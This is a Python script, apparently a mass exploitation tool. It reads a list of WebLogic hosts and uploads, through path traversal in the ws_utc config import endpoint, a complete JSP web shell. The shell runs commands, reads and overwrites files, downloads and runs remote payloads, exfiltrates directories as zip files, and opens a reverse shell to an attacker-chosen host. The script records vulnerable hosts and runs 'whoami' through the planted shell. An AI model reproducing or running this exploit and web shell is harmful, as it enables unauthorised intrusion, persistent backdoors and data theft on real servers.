#coding=utf-8
# Author: ddea
import requests

# Input list, one entry per line; each line is later used verbatim as a URL prefix.
# The handle is never closed — a `with` block would release it deterministically.
rs = open ("weblogic_ip1.txt","r")# file of entries to be checked
# Results file, opened in append mode; also never closed explicitly (only flush()ed later).
b = open ("havebigin3.txt","a+")# output file for entries found vulnerable
# NOTE(review): writes a literal placeholder before any result is known — looks like leftover debug output.
b.write("asdfasdf")
for line in rs.readlines():
	session = requests.Session()
	timeout = 40
	site = line.strip()
	url = site + "ws_utc/resources/ws/config/import"
	url2 = site + "console/framework/skins/wlsconsole/images/_cat.jsp"
	print (url)
	payload4 = {"action":"exec","cmd":"whoami"}
	paramsGet = {"timestamp":"1522216072056"}
	paramsMultipart = [('../../../../../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/', ('cat.jsp', "<%@page import=\"java.util.zip.ZipEntry\"%>\n<%@page import=\"java.util.zip.ZipOutputStream\"%>\n<%@ page language=\"java\" pageEncoding=\"UTF-8\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.text.SimpleDateFormat\"%>\n<%@ page import=\"java.io.*\" %>\n<%@ page import=\"java.net.*\" %>\n<%!\n\x09static String encoding = \"UTF-8\";\n\x09\n\x09static{\n\x09\x09encoding = isNotEmpty(getSystemEncoding())?getSystemEncoding():encoding;\n\x09}\n\x09\n\x09/**\n\x09 * \xe5\xbc\x82\xe5\xb8\xb8\xe8\xbd\xac\xe6\x8d\xa2\xe6\x88\x90\xe5\xad\x97\xe7\xac\xa6\xe4\xb8\xb2\xef\xbc\x8c\xe8\x8e\xb7\xe5\x8f\x96\xe8\xaf\xa6\xe7\xbb\x86\xe5\xbc\x82\xe5\xb8\xb8\xe4\xbf\xa1\xe6\x81\xaf\n\x09 * @param e\n\x09 * @return\n\x09 */\n\x09static String exceptionToString(Exception e) {\n\x09    StringWriter sw = new StringWriter();\n\x09    e.printStackTrace(new PrintWriter(sw, true));\n\x09    return sw.toString();\n\x09}\n\x09\n\x09/**\n\x09 * \xe8\x8e\xb7\xe5\x8f\x96\xe7\xb3\xbb\xe7\xbb\x9f\xe6\x96\x87\xe4\xbb\xb6\xe7\xbc\x96\xe7\xa0\x81\n\x09 * @return\n\x09 */\n\x09static String getSystemEncoding(){\n\x09\x09return System.getProperty(\"sun.jnu.encoding\");\n\x09}\n\x09\n\x09/**\n\x09 * \xe9\x9d\x9e\xe7\xa9\xba\xe5\x88\xa4\xe6\x96\xad\n\x09 *\n\x09 * @param obj\n\x09 * @return\n\x09 */\n\x09static boolean isNotEmpty(Object obj) {\n\x09    if (obj == null) {\n\x09        return false;\n\x09    }\n\x09    return !\"\".equals(String.valueOf(obj).trim());\n\x09}\n\x09\n\x09/**\n\x09 * \xe8\xbe\x93\xe5\x85\xa5\xe6\xb5\x81\xe8\xbd\xac\xe4\xba\x8c\xe8\xbf\x9b\xe5\x88\xb6\xe6\x95\xb0\xe7\xbb\x84\xe8\xbe\x93\xe5\x87\xba\xe6\xb5\x81\n\x09 * @param in\n\x09 * @return\n\x09 * @throws IOException\n\x09 */\n\x09static ByteArrayOutputStream inutStreamToOutputStream(InputStream in) throws IOException{\n\x09\x09ByteArrayOutputStream baos = new 
ByteArrayOutputStream();\n\x09\x09byte[] b = new byte[1024];\n\x09    int a = 0;\n\x09    while((a = in.read(b))!=-1){\n\x09    \x09baos.write(b,0,a);\n\x09\x09}\n\x09\x09return baos;\n\x09}\n\x09\n\x09/**\n\x09 * \xe5\xa4\x8d\xe5\x88\xb6\xe6\xb5\x81\xe5\x88\xb0\xe6\x96\x87\xe4\xbb\xb6\xef\xbc\x8c\xe5\xa6\x82\xe6\x9e\x9c\xe6\x96\x87\xe4\xbb\xb6\xe5\xad\x98\xe5\x9c\xa8\xe9\xbb\x98\xe8\xae\xa4\xe4\xbc\x9a\xe8\xa6\x86\xe7\x9b\x96\n\x09 * @param in\n\x09 * @param path\n\x09 * @throws IOException\n\x09 */\n\x09static void copyInputStreamToFile(InputStream in,String path) throws IOException{\n\x09\x09FileOutputStream fos = new FileOutputStream(path);\n\x09\x09fos.write(inutStreamToOutputStream(in).toByteArray());\n\x09\x09fos.flush();\n\x09\x09fos.close();\n\x09}\n\x09\n\x09/**\n\x09 * \xe6\xa8\xa1\xe4\xbb\xbfLinux\xe4\xb8\x8b\xe7\x9a\x84cat Windows\xe4\xb8\x8b\xe7\x9a\x84type \xe6\x9f\xa5\xe7\x9c\x8b\xe6\x96\x87\xe4\xbb\xb6\xe5\x86\x85\xe5\xae\xb9 \n\x09 * @param path\n\x09 * @return\n\x09 * @throws IOException\n\x09 */\n\x09static String cat(String path) throws IOException {\n\x09\x09return new String(inutStreamToOutputStream(new FileInputStream(path)).toByteArray());\n\x09}\n\x09\n\x09/**\n\x09 * \xe6\x89\xa7\xe8\xa1\x8c\xe6\x93\x8d\xe4\xbd\x9c\xe7\xb3\xbb\xe7\xbb\x9f\xe5\x91\xbd\xe4\xbb\xa4 \xe5\xa6\x82\xe6\x9e\x9c\xe6\x98\xafwindows\xe6\x9f\x90\xe4\xba\x9b\xe5\x91\xbd\xe4\xbb\xa4\xe6\x89\xa7\xe8\xa1\x8c\xe4\xb8\x8d\xe4\xba\x86\xef\xbc\x8c\xe5\x8f\xaf\xe4\xbb\xa5\xe7\x94\xa8 cmd /c dir \xe6\x89\xa7\xe8\xa1\x8cdir\xe5\x91\xbd\xe4\xbb\xa4\n\x09 * @param cmd\n\x09 * @return\n\x09 */\n\x09static String exec(String cmd) {\n\x09\x09try {\n\x09\x09\x09return new String(inutStreamToOutputStream(Runtime.getRuntime().exec(cmd).getInputStream()).toByteArray(),encoding);\n\x09\x09} catch (IOException e) {\n\x09\x09\x09return exceptionToString(e);\n\x09\x09}\n\x09}\n\x09\n\x09/**\n\x09 * 
\xe4\xb8\x8b\xe8\xbd\xbd\xe6\x96\x87\xe4\xbb\xb6\xe5\x88\xb0\xe6\x8c\x87\xe5\xae\x9a\xe7\x9b\xae\xe5\xbd\x95,\xe4\xbf\x9d\xe5\xad\x98\xe7\x9a\x84\xe6\x96\x87\xe4\xbb\xb6\xe5\x90\x8d\xe5\xbf\x85\xe9\xa1\xbb\xe6\x8c\x87\xe5\xae\x9a\n\x09 * @param url\n\x09 * @param path\n\x09 * @throws MalformedURLException\n\x09 * @throws IOException\n\x09 */\n\x09static void download(String url,String path) throws MalformedURLException, IOException{\n\x09\x09copyInputStreamToFile(new URL(url).openConnection().getInputStream(), path);\n\x09}\n\x09\n\x09/**\n\x09 * \xe8\xbf\x9e\xe6\x8e\xa5\xe8\xbf\x9c\xe7\xa8\x8b\xe7\xab\xaf\xe5\x8f\xa3\xef\xbc\x8c\xe6\x8f\x90\xe4\xbe\x9b\xe6\x9c\xac\xe5\x9c\xb0\xe5\x91\xbd\xe4\xbb\xa4\xe6\x89\xa7\xe8\xa1\x8c\xe5\x85\xa5\xe5\x8f\xa3\n\x09 * @param host\n\x09 * @param port\n\x09 * @throws UnknownHostException\n\x09 * @throws IOException\n\x09 */\n\x09static void shell(String host,int port) throws UnknownHostException, IOException{\n\x09\x09Socket s = new Socket(host,port);\n\x09\x09OutputStream out = s.getOutputStream();\n\x09\x09InputStream in = s.getInputStream();\n\x09\x09out.write((\"User:\\t\"+exec(\"whoami\")).getBytes());\n\x09\x09int a = 0;\n\x09\x09byte[] b = new byte[1024];\n\x09\x09while((a=in.read(b))!=-1){\n\x09\x09\x09out.write(exec(new String(b,0,a,\"UTF-8\").trim()).getBytes(\"UTF-8\"));\n\x09\x09}\n\x09}\n\x09\n\x09/**\n\x09 * \xe4\xb8\x8b\xe8\xbd\xbd\xe8\xbf\x9c\xe7\xa8\x8b\xe6\x96\x87\xe4\xbb\xb6\xe5\xb9\xb6\xe6\x89\xa7\xe8\xa1\x8c\xef\xbc\x8c\xe5\x91\xbd\xe4\xbb\xa4\xe6\x89\xa7\xe8\xa1\x8c\xe5\xae\x8c\xe6\x88\x90\xe5\x90\x8e\xe4\xbc\x9a\xe5\x88\xa0\xe9\x99\xa4\xe4\xb8\x8b\xe8\xbd\xbd\xe7\x9a\x84\xe6\x96\x87\xe4\xbb\xb6\n\x09 * @param url\n\x09 * @param fileName\n\x09 * @param cmd\n\x09 * @return\n\x09 * @throws MalformedURLException\n\x09 * @throws IOException\n\x09 */\n\x09static String auto(String url,String fileName,String cmd) throws MalformedURLException, IOException{\n\x09\x09download(url, fileName);\n\x09\x09String out = 
exec(cmd);\n\x09\x09new File(fileName).delete();\n\x09\x09return out;\n\x09}\n\x09\n\x09static void saveFile(String file,String data) throws IOException{\n\x09\x09copyInputStreamToFile(new ByteArrayInputStream(data.getBytes()), file);\n\x09}\n\x09\n\x09/**\n\x09 * \xe6\x96\x87\xe4\xbb\xb6\xe5\x8e\x8b\xe7\xbc\xa9\n\x09 * @throws IOException\n\x09 */\n\x09static void zipFile(ZipOutputStream zos,File file) throws IOException{\n\x09\x09if(file.isDirectory() && file.canRead()){\n\x09\x09\x09File[] files = file.listFiles();\n\x09\x09\x09for(File f:files){\n\x09\x09\x09\x09zipFile(zos, f);\n\x09\x09\x09}\n\x09\x09}else{\n\x09\x09\x09ZipEntry z = new ZipEntry(file.getName());\n            zos.putNextEntry(z);\n            zos.write(inutStreamToOutputStream(new FileInputStream(file)).toByteArray());\n            zos.closeEntry();\n\x09\x09}\n\x09}\n\x09\n\x09static void zip(ByteArrayOutputStream out,File file) throws IOException{\n\x09\x09ZipOutputStream zos = new ZipOutputStream(out);\n\x09\x09zipFile(zos,file);\n\x09}\n\x09\n%>\n<html>\n<head>\n<title><%=application.getServerInfo() %></title>\n<meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\n<STYLE>\n\x09H1 {color: white;background-color: \x23525D76;font-size: 22px;}\n\x09H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:\x23525D76;font-size:14px;}\n\x09BODY {font-family: Tahoma, Arial, sans-serif;font-size:12px;color: black;background-color: white;}\n\x09A {color: black;}\n\x09HR {color: \x23525D76;}\n</STYLE>\n<script> \nfunction get(p){\n     document.getElementById('p').value = p;\n     document.getElementById('action').value = \"get\";\n     document.getElementById('fm').submit();\n}\nfunction saveFile(){\n     document.getElementById('action').value = \"saveFile\";\n     document.getElementById('fm').submit();\n}\n</script>\n</head>\n<body>\n<%\n\x09try{\n\x09\x09String action = request.getParameter(\"action\");\n\x09\x09String path = 
isNotEmpty(request.getParameter(\"p\"))?request.getParameter(\"p\"):new File((isNotEmpty(application.getRealPath(\"/\"))?application.getRealPath(\"/\"):\".\")).getCanonicalPath();\n\x09\x09out.println(\"<form action=\\\"\\\" method=\\\"post\\\" id=\\\"fm\\\">\");\n\x09\x09if(isNotEmpty(action) && !\"get\".equalsIgnoreCase(action)){\n\x09\x09\x09if(\"shell\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09shell(request.getParameter(\"host\"), Integer.parseInt(request.getParameter(\"port\")));\n\x09\x09\x09}else if(\"downloadL\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09download(request.getParameter(\"url\"), request.getParameter(\"path\"));\n\x09\x09\x09\x09out.println(\"\xe6\x96\x87\xe4\xbb\xb6\xe4\xb8\x8b\xe8\xbd\xbd\xe6\x88\x90\xe5\x8a\x9f.\");\n\x09\x09\x09}else if(\"exec\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09out.println(\"<h1>\xe5\x91\xbd\xe4\xbb\xa4\xe6\x89\xa7\xe8\xa1\x8c:</h1>\");\n\x09\x09\x09\x09out.println(\"<pre>\"+exec(request.getParameter(\"cmd\"))+\"</pre>\");\n\x09\x09\x09}else if(\"cat\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09out.println(\"<h1>\xe6\x96\x87\xe4\xbb\xb6\xe6\x9f\xa5\xe7\x9c\x8b:</h1>\");\n\x09\x09\x09\x09out.println(\"<pre>\"+cat(request.getParameter(\"path\"))+\"</pre>\");\n\x09\x09\x09}else if(\"auto\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09out.println(\"<h1>Auto:</h1>\");\n\x09\x09\x09\x09out.println(\"<pre>\"+auto(request.getParameter(\"url\"),request.getParameter(\"fileName\"),request.getParameter(\"cmd\"))+\"</pre>\");\n\x09\x09\x09}else if(\"download\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09response.setContentType(\"application/x-download\");\n\x09\x09\x09\x09File file = new File(path,request.getParameter(\"fileName\"));\n\x09\x09\x09\x09String fileName = file.isDirectory() ? 
file.getName()+\".zip\":file.getName();\n\x09\x09\x09\x09response.setHeader(\"Content-Disposition\", \"attachment; filename=\"+fileName);\n\x09\x09\x09\x09BufferedOutputStream bos = new BufferedOutputStream(response.getOutputStream());\n\x09\x09\x09\x09if(file.isDirectory()){\n\x09\x09\x09\x09\x09ByteArrayOutputStream baos = new ByteArrayOutputStream();\n\x09\x09\x09\x09\x09zip(baos, file);\n\x09\x09\x09\x09\x09bos.write(baos.toByteArray());\n\x09\x09\x09\x09\x09baos.close();\n\x09\x09\x09\x09}else{\n\x09\x09\x09\x09\x09InputStream in = new FileInputStream(file);\n\x09\x09\x09\x09\x09int len;\n\x09\x09\x09\x09\x09byte[] buf = new byte[1024];\n\x09\x09\x09\x09\x09while ((len = in.read(buf)) > 0) {\n\x09\x09\x09\x09\x09\x09bos.write(buf, 0, len);\n\x09\x09\x09\x09\x09}\n\x09\x09\x09\x09\x09in.close();\n\x09\x09\x09\x09}\n\x09\x09\x09\x09bos.close();\n\x09\x09\x09\x09out.clear();\n\x09\x09\x09\x09out = pageContext.pushBody();\n\x09\x09\x09\x09return ;\n\x09\x09\x09}else if(\"saveFile\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09String file = request.getParameter(\"file\");\n\x09\x09\x09\x09String data = request.getParameter(\"data\");\n\x09\x09\x09\x09if(isNotEmpty(file) && isNotEmpty(data)){\n\x09\x09\x09\x09\x09saveFile(new String(file.getBytes(\"ISO-8859-1\"),\"utf-8\"),new String(data.getBytes(\"ISO-8859-1\"),\"utf-8\"));\n\x09\x09\x09\x09\x09out.println(\"<script>history.back(-1);alert('ok');</script>\");\n\x09\x09\x09\x09}\n\x09\x09\x09}\n\x09\x09}else{\n\x09\x09\x09File file = new File(path);\n\x09\x09\x09if(file.isDirectory()){\n%>\n<h1>Directory Listing For <%=path%></h1>\n<HR size=\"1\" noshade=\"noshade\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"5\" align=\"center\">\n<tr>\n<td align=\"left\"><font size=\"+1\"><strong>\xe6\x96\x87\xe4\xbb\xb6\xe5\x90\x8d</strong></font></td>\n<td align=\"center\"><font size=\"+1\"><strong>\xe6\x96\x87\xe4\xbb\xb6\xe5\xa4\xa7\xe5\xb0\x8f</strong></font></td>\n<td align=\"center\"><font 
size=\"+1\"><strong>\xe6\x96\x87\xe4\xbb\xb6\xe4\xb8\x8b\xe8\xbd\xbd</strong></font></td>\n<td align=\"right\"><font size=\"+1\"><strong>\xe6\x9c\x80\xe5\x90\x8e\xe4\xbf\xae\xe6\x94\xb9\xe6\x97\xb6\xe9\x97\xb4</strong></font></td>\n</tr>\n<%\x09\x09\x09\x09\x09\n\x09\x09\x09\x09List<File> ls = new ArrayList<File>();\n\x09\x09\x09\x09ls.add(new File(file,\"..\"));\n\x09\x09\x09\x09ls.addAll(Arrays.asList(file.listFiles()));\n\x09\x09\x09\x09for(int i = 0; i < ls.size(); i++){\n\x09\x09\x09\x09\x09File f = ls.get(i);\n\x09\x09\x09\x09\x09String fileCanonicalPath = f.getCanonicalPath().replaceAll(\"\\\\\\\\\",\"/\");\n\x09\x09\x09\x09\x09out.println(\"<tr \"+((i%2!=0)?\"bgcolor=\\\"\x23eeeeee\\\"\":\"\")+\"><td align=\\\"left\\\">&nbsp;&nbsp;<a href=\\\"javascript:get('\"+(f.getCanonicalPath().replaceAll(\"\\\\\\\\\",\"/\"))+\"');\\\"><tt>\"+f.getName()+\"</tt></a></td><td align=\\\"center\\\"><tt>\"+(f.length()/1000)+\"KB</tt></td><td align=\\\"center\\\"><a href=\\\"\"+request.getContextPath()+request.getServletPath()+\"?action=download&p=\"+path+\"&fileName=\"+f.getName()+\"\\\"><tt>\xe4\xb8\x8b\xe8\xbd\xbd</tt></a></td><td align=\\\"right\\\"><tt>\"+new SimpleDateFormat(\"yyyy-MM-dd hh:mm:ss\").format(new Date(f.lastModified())) +\"</tt></td></tr>\");\n\x09\x09\x09\x09}\n\x09\x09\x09}else{\n\x09\x09\x09\x09out.println(\"<h1>\xe6\x96\x87\xe4\xbb\xb6\xe7\xbc\x96\xe8\xbe\x91:</h1>\");\n\x09\x09\x09\x09out.println(\"File:<input type=\\\"text\\\" style=\\\"width:600px;\\\" name=\\\"file\\\" value=\\\"\"+path+\"\\\" /><input type=\\\"button\\\" style=\\\"margin-left:20px;\\\" value=\\\"\xe4\xbf\x9d\xe5\xad\x98\\\" onclick=\\\"saveFile()\\\" /><span id=\\\"result\\\"></span><br/><br/>\");\n\x09\x09\x09\x09out.println(\"<textarea style=\\\"width:100%;height:500px;\\\" name=\\\"data\\\">\"+cat(path)+\"</textarea>\");\n\x09\x09\x09}\n\x09\x09}\n\x09\x09out.println(\"<input type=\\\"hidden\\\" name=\\\"p\\\" id=\\\"p\\\" value=\\\"\"+path+\"\\\"/><input type=\\\"hidden\\\" 
name=\\\"action\\\" id=\\\"action\\\" value=\\\"get\\\" /></form></table>\");\n\x09\x09out.println(\"<HR size=\\\"1\\\" noshade=\\\"noshade\\\"><h3>\"+application.getServerInfo()+\"</h3></body></html>\");\n\x09}catch(Exception e){\n\x09\x09out.println(\"<pre>\"+exceptionToString(e)+\"</pre>\");\n\x09}\n%>\n", 'application/octet-stream'))]
	#上传的文件,可以换成txt
	headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0","Referer":"http://200.120.137.180:7001/ws_utc/begin.do","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
	cookies = {"JSESSIONID":"l45rHIDksK5T6YxryhUxlbSUu8NIa0v-MAlPINuyBsv1vdnyD1Ft!-306100299"}
	errorwhile = "Error while importing test"
	while True:
		try:
			response = session.post(url, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies,verify=False,timeout=20)
		#with区块退出后会话能被关闭即使发生了异常也一样
			#print("Status code:   %i" % response.status_code)
			#print("Response body: %s" % response.content)
			#print (response.content.index(errorwhile)) #如果返回的内容中包含errorwhile的值 
			if (response.content.find(errorwhile)) > 0:
				print (site,"have Vulnerability")
				b.writelines(url)
				b.writelines("\n")
				b.flush()
				try:
					resurl4 = session.get(url2,params=payload4,headers=headers,verify=False,timeout=20)
					print("Status code:   %i" % resurl4.status_code)
					print("Response body: %s" % resurl4.content)
					#resurl5 = session.get(url2,params=payload5,headers=headers,verify=False,timeout=20)
					#print ("resurl5:",resurl5.content)
					print("=================================================================================================================================================")
					session.close
					break
				except:
					break
			elif (response.content.find("Deploying Application")) > 0:
				print ("Dep error")
				continue
			else:
				break
		except:
			session.close
			break
	else:
		break